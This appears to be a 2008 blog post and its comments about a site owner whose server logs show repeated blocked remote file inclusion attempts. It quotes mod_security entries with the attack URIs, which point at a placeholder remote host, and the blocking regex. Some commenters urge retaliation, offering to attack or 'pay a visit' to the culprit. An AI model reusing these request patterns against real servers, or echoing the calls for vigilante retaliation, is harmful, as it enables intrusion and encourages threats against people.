We are being flooded by hack attempts. Here is an excerpt of the access logs:
[Mon Jan 7 09:18:06 2008] [error] [client 69.93.20.XXX] mod_security: Access denied with code 503. Pattern match “=(\\\\.\\\\.|http|https|ftp)\
\\\:” at REQUEST_URI [id “HG2007072020″][rev “1″] [msg “HG: libwww UA with RFI”] [severity “NOTICE”] [hostname “getyacg.com“] [uri “/support///config.inc.php ?path_escape//////config.inc .php?path_escape=SOMEHACKERURL”]
[Mon Jan 7 09:18:06 2008] [error] [client 69.93.20.XXX] mod_security: Access denied with code 503. Pattern match “=(\\\\.\\\\.|http|https|ftp)\\\\:” at REQUEST_URI [id “HG2007072020″][rev “1″] [msg “HG: libwww UA with RFI”] [severity “NOTICE”] [hostname “getyacg.com“] [uri “///config.inc.php?path_escape //////config.inc.php?path _escape=SOMEHACKERURL”]
[Mon Jan 7 09:18:23 2008] [error] [client 69.93.20.XXX] mod_security: Access denied with code 503. Pattern match “=(\\\\.\\\\.|http|https|ftp)\\\\:” at REQUEST_URI [id “HG2007072020″][rev “1″] [msg “HG: libwww UA with RFI”] [severity “NOTICE”] [hostname “getyacg.com“] [uri “/support///config.inc.php ?path_escape//////config.inc .php?path_escape=SOMEHACKERURL”]
[Mon Jan 7 09:18:23 2008] [error] [client 69.93.20.XXX] mod_security: Access denied with code 503. Pattern match “=(\\\\.\\\\.|http|https|ftp)\\\\:” at REQUEST_URI [id “HG2007072020″][rev “1″] [msg “HG: libwww UA with RFI”] [severity “NOTICE”] [hostname “getyacg.com“] [uri “///config.inc.php?path_escape //////config.inc.php?path _escape=SOMEHACKERURL”]
[Mon Jan 7 09:30:39 2008] [error] [client 69.93.20.XXX] mod_security: Access denied with code 503. Pattern match “=(\\\\.\\\\.|http|https|ftp)\\\\:” at REQUEST_URI [id “HG2007072020″][rev “1″] [msg “HG: libwww UA with RFI”] [severity “NOTICE”] [hostname “getyacg.com“] [uri “/support///config.inc.php ?path_escape//////config.inc .php?path_escape=SOMEHACKERURL”]
[Mon Jan 7 09:30:39 2008] [error] [client 69.93.20.XXX] mod_security: Access denied with code 503. Pattern match “=(\\\\.\\\\.|http|https|ftp)\\\\:” at REQUEST_URI [id “HG2007072020″][rev “1″] [msg “HG: libwww UA with RFI”] [severity “NOTICE”] [hostname “getyacg.com“] [uri “///config.inc.php?path_escape //////config.inc.php?path _escape=SOMEHACKERURL”]
It’s all coming from the same host, and I have a pretty good idea of what they are attempting… But I’m not sure if it’s an automated attack and I’m a random victim or it’s a personal attack against [YACG].
I will take care of this ASAP and let you guys now what this is all about…
Lets find thos bastards. Ive been getting attacked since the 6 first a ddos then a cpanel attack then all sql databases were dumped. I would love to find the bastard that is doing this. When you find him or her let me know. i dont work and i would love to pay the weasels a visit. Us georgia boys will take care of if for you boss.
Hello my friend, I guess this explains what happened to the serps as of late. You know we are with you, just tell us and we will attack the fools. Any moron that will attack the coolest blackhat just has to be dealt with.
As always, you rock they suck. Lets get em’
hi there
I found your blog and site recently.Great ideas so thanks for sharing your knowledge.I am wonder though what this was all about, i mean this hack attempts?Did you take care of this and what’s the resolution?